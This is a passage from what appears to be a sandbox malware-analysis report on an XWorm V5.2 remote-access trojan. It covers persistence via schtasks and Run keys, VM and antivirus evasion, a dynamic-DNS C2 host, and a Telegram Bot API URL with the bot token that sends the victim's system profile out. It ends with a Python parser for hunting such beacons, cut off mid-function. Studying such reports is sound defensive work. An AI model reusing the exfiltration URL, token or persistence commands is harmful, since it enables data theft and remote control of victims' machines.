            Source: 16.2.task.exe.122c9ac0.0.raw.unpack, Messages.cs .Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: 16.2.task.exe.122f0908.2.raw.unpack, Messages.cs .Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: 16.2.task.exe.12317740.1.raw.unpack, Messages.cs .Net Code: _202E_202C_200F_206F_200D_206F_206F_202E_206A_200F_202A_200C_202E_206C_206C_206C_200E_202A_206A_206D_202E_200F_206C_206C_206C_206B_206A_206D_202E_206C_202B_202C_206E_202E_202B_206D_206D_206D_202A_200E_202E System.AppDomain.Load(byte[])
            Source: WindowsApp.exe.2.dr Static PE information: section name: dCocB{
            Source: WindowsApp.exe.2.dr Static PE information: section name:
            Source: task.exe.7.dr Static PE information: section name: dCocB{
            Source: task.exe.7.dr Static PE information: section name:
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe Code function: 7_2_00007FFAAC4E976F pushfd ; ret 7_2_00007FFAAC4E97C1
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe Code function: 7_2_00007FFAAC4D5926 push ds; iretd 7_2_00007FFAAC4D5929
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe Code function: 7_2_00007FFAAC4E7483 push ebx; ret 7_2_00007FFAAC4E7484
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe Code function: 7_2_00007FFAAC4C00BD pushad ; iretd 7_2_00007FFAAC4C00C1
            Source: C:\Users\user\AppData\Roaming\task.exe Code function: 12_2_00BDC92F push rbx; ret 12_2_00BDC931
            Source: C:\Users\user\AppData\Roaming\task.exe Code function: 12_2_00007FFAAC4B3D85 push esp; retf 12_2_00007FFAAC4B3D86
            Source: C:\Users\user\AppData\Roaming\task.exe Code function: 14_2_00007FFAAC4A3D85 push esp; retf 14_2_00007FFAAC4A3D86
            Source: C:\Users\user\AppData\Roaming\task.exe Code function: 15_2_00007FFAAC4D00BD pushad ; iretd 15_2_00007FFAAC4D00C1
            Source: C:\Users\user\AppData\Roaming\task.exe Code function: 15_2_00007FFAAC4D3D85 push esp; retf 15_2_00007FFAAC4D3D86
            Source: C:\Users\user\AppData\Roaming\task.exe Code function: 16_2_00007FFAAC4C00BD pushad ; iretd 16_2_00007FFAAC4C00C1
            Source: C:\Users\user\AppData\Roaming\task.exe Code function: 16_2_00007FFAAC4C3D85 push esp; retf 16_2_00007FFAAC4C3D86
            Source: C:\Users\user\AppData\Roaming\task.exe Code function: 20_2_00007FFAAC4C00BD pushad ; iretd 20_2_00007FFAAC4C00C1
            Source: C:\Users\user\AppData\Roaming\task.exe Code function: 20_2_00007FFAAC4D5926 push ds; iretd 20_2_00007FFAAC4D5929
            Source: C:\Users\user\AppData\Roaming\task.exe Code function: 20_2_00007FFAAC4D7A41 push ecx; iretd 20_2_00007FFAAC4D7A42
            Source: WindowsApp.exe.2.dr Static PE information: section name: dCocB{ entropy: 7.998877154551337
            Source: task.exe.7.dr Static PE information: section name: dCocB{ entropy: 7.998877154551337
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe File created: C:\Users\user\AppData\Roaming\task.exe
            Source: C:\Windows\System32\wscript.exe File created: C:\Users\user\AppData\Local\Temp\WindowsApp.exe

            Boot Survival

            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe"
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\task.lnk
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run task
            Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Users\user\AppData\Roaming\task.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exe; Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exe; Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: global traffic; HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Memory allocated: 860000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Memory allocated: 1A480000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\task.exe; Memory allocated: 1110000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\task.exe; Memory allocated: 1AF50000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\task.exe; Memory allocated: 1660000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\task.exe; Memory allocated: 1B0C0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\task.exe; Memory allocated: F30000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\task.exe; Memory allocated: 1ACC0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\task.exe; Memory allocated: 7A0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\task.exe; Memory allocated: 1A2C0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\task.exe; Memory allocated: 1380000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Roaming\task.exe; Memory allocated: 1B1D0000 memory reserve | memory write watch
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 600000
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 599872
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 599765
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 599656
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 599546
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 599437
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 599328
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 599218
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 599090
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 598984
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 598875
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Thread delayed: delay time: 598760
            Source: C:\Users\user\AppData\Roaming\task.exe; Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\wscript.exe; Window found: window name: WSH-Timer
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Window / User API: threadDelayed 5882
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Window / User API: threadDelayed 3890
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -33204139332677172s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -600000s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -599872s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -599765s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -599656s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -599546s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -599437s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -599328s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -599218s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -599090s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -598984s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -598875s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe TID: 520; Thread sleep time: -598760s >= -30000s
            Source: C:\Users\user\AppData\Roaming\task.exe TID: 7204; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\task.exe TID: 7376; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\task.exe TID: 7500; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\task.exe TID: 7556; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Roaming\task.exe TID: 7932; Thread sleep time: -922337203685477s >= -30000s
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\conhost.exe; Last function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; File Volume queried: C:\ FullSizeInformation
            Source: C:\Users\user\AppData\Roaming\task.exe; File Volume queried: C:\ FullSizeInformation
            Source: task.exe, 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: vmware
            Source: WindowsApp.exe, 00000007.00000002.2431833922.000000001B450000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllqq|;
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Process information queried: ProcessInformation

            Anti Debugging

            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Code function: 7_2_00007FFAAC4E07E8 CheckRemoteDebuggerPresent, 7_2_00007FFAAC4E07E8
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Process queried: DebugPort
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Memory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\System32\wscript.exe; File created: WindowsApp.exe.2.dr
            Source: C:\Windows\System32\wscript.exe; Process created: C:\Users\user\AppData\Local\Temp\WindowsApp.exe "C:\Users\user~1\AppData\Local\Temp\WindowsApp.exe"
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "task" /tr "C:\Users\user\AppData\Roaming\task.exe"
            Source: WindowsApp.exe, 00000007.00000002.2427816962.000000000254A000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002894000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>1864657
            Source: WindowsApp.exe, 00000007.00000002.2427816962.000000000254A000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002517000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program Manager
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002512000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -PING!<Xwormmm>Program Manager<Xwormmm>2052191
            Source: WindowsApp.exe, 00000007.00000002.2427816962.000000000254A000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002894000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>0
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -PING!<Xwormmm>Program Manager<Xwormmm>1864657@
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002517000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -PING!<Xwormmm>Program Manager<Xwormmm>2055746@
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002512000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -PING!<Xwormmm>Program Manager<Xwormmm>2052191@
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002512000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>2052191
            Source: WindowsApp.exe, 00000007.00000002.2427816962.000000000254A000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.00000000027FA000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002894000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: 'PING!<Xwormmm>Program Manager<Xwormmm>0@
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: ,PING!<Xwormmm>Program Manager<Xwormmm>184695@
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: ,PING!<Xwormmm>Program Manager<Xwormmm>184695
            Source: WindowsApp.exe, 00000007.00000002.2427816962.000000000254A000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002517000.00000004.00000800.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: Program Manager2
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002517000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -PING!<Xwormmm>Program Manager<Xwormmm>2055746
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>184695
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002537000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: -PING!<Xwormmm>Program Manager<Xwormmm>1864657
            Source: WindowsApp.exe, 00000007.00000002.2427816962.0000000002517000.00000004.00000800.00020000.00000000.sdmp; Binary or memory string: PING!<Xwormmm>Program Manager<Xwormmm>2055746
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Queries volume information: C:\Users\user\AppData\Local\Temp\WindowsApp.exe VolumeInformation
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; Queries volume information: C:\ VolumeInformation
            Source: C:\Users\user\AppData\Roaming\task.exe; Queries volume information: C:\Users\user\AppData\Roaming\task.exe VolumeInformation
            Source: C:\Windows\System32\wscript.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
            Source: WindowsApp.exe, 00000007.00000002.2431833922.000000001B450000.00000004.00000020.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2431833922.000000001B516000.00000004.00000020.00020000.00000000.sdmp, WindowsApp.exe, 00000007.00000002.2432794842.000000001C17D000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
            Source: C:\Users\user\AppData\Local\Temp\WindowsApp.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

            Stealing of Sensitive Information

            Source: Yara match; File source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: WindowsApp.exe PID: 1204, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: task.exe PID: 7172, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: task.exe PID: 7352, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: task.exe PID: 7480, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: task.exe PID: 7532, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: task.exe PID: 7912, type: MEMORYSTR
            Source: Yara match; File source: sslproxydump.pcap, type: PCAP

            Remote Access Functionality

            Source: Yara match; File source: 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match; File source: Process Memory Space: WindowsApp.exe PID: 1204, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: task.exe PID: 7172, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: task.exe PID: 7352, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: task.exe PID: 7480, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: task.exe PID: 7532, type: MEMORYSTR
            Source: Yara match; File source: Process Memory Space: task.exe PID: 7912, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
MITRE ATT&CK Matrix (14 tactic columns, 8 rows, rebuilt from the flattened layout). Bracketed numbers are the signature-count badges the report attaches to matched cells, kept as extracted; entries without a badge are the unmatched template cells of the matrix.

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: [221] Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: [12] Windows Management Instrumentation; [1] Exploitation for Client Execution; [1] Scheduled Task/Job; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: [221] Scripting; [1] DLL Side-Loading; [1] Scheduled Task/Job; [21] Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: [1] DLL Side-Loading; [12] Process Injection; [1] Scheduled Task/Job; [21] Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: [1] Disable or Modify Tools; [1] Deobfuscate/Decode Files or Information; [4] Obfuscated Files or Information; [12] Software Packing; [1] DLL Side-Loading; [1] Masquerading; [151] Virtualization/Sandbox Evasion; [12] Process Injection
Credential Access: [1] Input Capture; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: [1] File and Directory Discovery; [23] System Information Discovery; [441] Security Software Discovery; [2] Process Discovery; [151] Virtualization/Sandbox Evasion; [1] Application Window Discovery; [1] System Network Configuration Discovery; System Owner/User Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
Collection: [11] Archive Collected Data; [1] Input Capture; [1] Clipboard Data; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Command and Control: [1] Web Service; [1] Ingress Tool Transfer; [11] Encrypted Channel; [1] Non-Standard Port; [2] Non-Application Layer Protocol; [23] Application Layer Protocol; Commonly Used Port; Application Layer Protocol
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph (ID 1526836, sample SOA-injazfe-10424.vbs, start date 06/10/2024, architecture WINDOWS, score 100; rebuilt as a process tree from the flattened graph. The numbers after a process name are the graph's created-registry-value / created-file counters, kept as shown.)

Start node
  Network: isika.ddns.net (Uses dynamic DNS services); api.telegram.org (Uses the Telegram API (likely for C&C communication)); 3 other IPs or domains
  Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Malicious sample detected (through community Yara rule); 12 other signatures
  Started: wscript.exe (2); task.exe (3); task.exe (2); 3 other processes

wscript.exe (2)
  Dropped: C:\Users\user\AppData\...\WindowsApp.exe, PE32
  Signatures: Benign windows process drops PE files; VBScript performs obfuscated calls to suspicious functions; Windows Scripting host queries suspicious COM object (likely to drop second stage)
  Started: WindowsApp.exe (15 6)

task.exe (3)
  Signatures: Antivirus detection for dropped file; Machine Learning detection for dropped file

WindowsApp.exe (15 6)
  Network: ip-api.com 208.95.112.1, ports 49699, 80, TUT-ASUS, United States; api.telegram.org 149.154.167.220, ports 443, 49701, TELEGRAMRU, United Kingdom; isika.ddns.net 45.88.91.147, ports 49494, 49620, 49621, LVLT-10753US, Bulgaria
  Dropped: C:\Users\user\AppData\Roaming\task.exe, PE32
  Signatures: Antivirus detection for dropped file; Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines); Machine Learning detection for dropped file; 3 other signatures
  Started: schtasks.exe (1); WerFault.exe

schtasks.exe (1)
  Started: conhost.exe

Source | Detection | Scanner | Label
SOA-injazfe-10424.vbs | 11% | ReversingLabs | Document-HTML.Hacktool.Heuristic
SOA-injazfe-10424.vbs | 100% | Avira | HTML/ExpKit.Gen2

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Temp\WindowsApp.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Roaming\task.exe | 100% | Avira | TR/Dropper.Gen
C:\Users\user\AppData\Local\Temp\WindowsApp.exe | 100% | Joe Sandbox ML | -
C:\Users\user\AppData\Roaming\task.exe | 100% | Joe Sandbox ML | -

No Antivirus matches
No Antivirus matches

Source | Detection | Scanner | Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://ip-api.com/line/?fields=hosting | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
isika.ddns.net | 45.88.91.147 | true | true | - | unknown
ip-api.com | 208.95.112.1 | true | true | - | unknown
api.telegram.org | 149.154.167.220 | true | true | - | unknown
198.187.3.20.in-addr.arpa | unknown | unknown | true | - | unknown
50.23.12.20.in-addr.arpa | unknown | unknown | true | - | unknown
Name | Malicious | Antivirus Detection | Reputation
isika.ddns.net | true | - | unknown
https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=7062075018&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A662C920EC437F040F44A%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%201YPBEL4ES%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2 | true | - | unknown
http://ip-api.com/line/?fields=hosting | false | URL Reputation: safe | unknown

Name | Source | Malicious | Antivirus Detection | Reputation
https://api.telegram.org/bot | WindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000C.00000002.1401173350.0000000002FC2000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000E.00000002.1470803241.000000000313A000.00000004.00000800.00020000.00000000.sdmp, task.exe, 0000000F.00000002.1517385326.0000000002D32000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000010.00000002.1554860101.000000000231E000.00000004.00000800.00020000.00000000.sdmp, task.exe, 00000014.00000002.2187461763.000000000324C000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | WindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70/sendMessage?chat_id=70620 | WindowsApp.exe, 00000007.00000002.2427816962.0000000002481000.00000004.00000800.00020000.00000000.sdmp | true | - | unknown
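The sendMessage URL in the table above is the XWorm "New Clinet" check-in: the bot token and chat_id identify the operator's Telegram bot, and the percent-encoded text carries the victim profile. The following Python is an added example, not code from the Joe Sandbox report or from XWorm. It parses any Telegram Bot API URL of that shape into bot id, token, chat_id and the beacon fields, and then scans constructed proxy-log lines (an assumption; only the last line carries the URL actually observed in the report) for Bot API calls, which is how a SOC would hunt for this C2 channel in web-proxy data.

```python
"""Extract XWorm Telegram beacon fields from a Bot API sendMessage URL and
hunt for Bot API calls in proxy-log lines.

Added example (not part of the sandbox report or of XWorm).  The proxy-log
lines in SAMPLE_LOG are constructed; the URL in XWORM_URL is the one the
report lists.  Result key names are this example's own choice.
"""
import re
from urllib.parse import urlsplit, parse_qs

# Telegram Bot API path layout: /bot<numeric bot id>:<secret>/<method>
BOT_PATH_RE = re.compile(
    r"^/bot(?P<bot_id>\d+):(?P<secret>[A-Za-z0-9_-]+)/(?P<method>\w+)$")

XWORM_URL = (
    "https://api.telegram.org/bot7048705146:AAEWMpbRl0e1tLVdgRabv3lMkCrjbYtiS70"
    "/sendMessage?chat_id=7062075018&text=%E2%98%A0%20%5BXWorm%20V5.2%5D%0D%0A"
    "%0D%0ANew%20Clinet%20:%20%0D%0A662C920EC437F040F44A%0D%0A%0D%0AUserName"
    "%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB"
    "%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%201YPBEL4ES%20%0D%0ARAM"
    "%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.2")


def parse_telegram_beacon(url):
    """Return a dict describing a Bot API call, or None if url is not one."""
    parts = urlsplit(url)
    if parts.hostname != "api.telegram.org":
        return None
    m = BOT_PATH_RE.match(parts.path)
    if m is None:
        return None
    qs = parse_qs(parts.query)
    text = qs.get("text", [""])[0]      # parse_qs already percent-decodes as UTF-8
    fields, pending, banner = {}, None, None
    for line in text.replace("\r\n", "\n").split("\n"):
        line = line.strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if sep:                          # "Key : Value", or "Key : " with the value on the next line
            key, value = key.strip(), value.strip()
            if value:
                fields[key] = value
            else:
                pending = key
        elif pending:                    # continuation line (XWorm puts the client id here)
            fields[pending] = line
            pending = None
        elif banner is None:             # first free-text line, e.g. "☠ [XWorm V5.2]"
            banner = line
    return {
        "bot_id": m.group("bot_id"),
        "token": f"{m.group('bot_id')}:{m.group('secret')}",
        "method": m.group("method"),
        "chat_id": qs.get("chat_id", [None])[0],
        "banner": banner,
        "fields": fields,
    }


def find_bot_api_calls(log_lines):
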